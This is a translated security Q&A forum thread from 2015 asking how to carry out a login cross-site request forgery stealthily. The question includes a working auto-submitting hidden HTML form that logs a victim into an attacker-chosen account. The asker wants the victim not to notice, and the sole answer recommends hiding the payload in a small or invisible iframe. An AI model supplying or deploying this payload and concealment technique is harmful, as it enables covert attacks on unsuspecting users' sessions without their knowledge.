Cómo llevar a cabo un CSRF de manera sigilosa

4

Soy un estudiante graduado de matemáticas que se dedica a la seguridad de la red. Estaba jugando con la falsificación de solicitud de inicio de sesión entre sitios, y el objetivo principal es iniciar sesión en alguien (soy un principiante completo en HTML y JavaScript).

Mi código hasta ahora:

<form method="Post" action="example.com">

<input type="hidden" name="username" value="NotAHacker" />
  <input type="hidden" name="password" value="H4x0r" />

</form>

<script> 
    document.forms[0].submit();
</script>  

Este código funciona perfectamente, quiero saber cómo hacerlo, sin que se abra una ventana, o al menos hacerlo de tal manera que la página esté en blanco y la víctima no se dé cuenta de lo que sucedió. Escuché que JQuery podría ayudar con esto? Una vez más, no sé HTML o JavaScript y podría usar algunos consejos.

    
pregunta cpt Wobles 29.11.2015 - 02:43
fuente

1 respuesta

1

La forma más fácil es probablemente un iFrame pequeño u oculto.

Incruste un iFrame en su página con un src de su otra página que contenga el código CSRF. El iFrame se redirigirá, pero es poco probable que el usuario lo note porque no podrá verlo.

    
respondido por el thexacre 29.11.2015 - 03:10
fuente

Lea otras preguntas en las etiquetas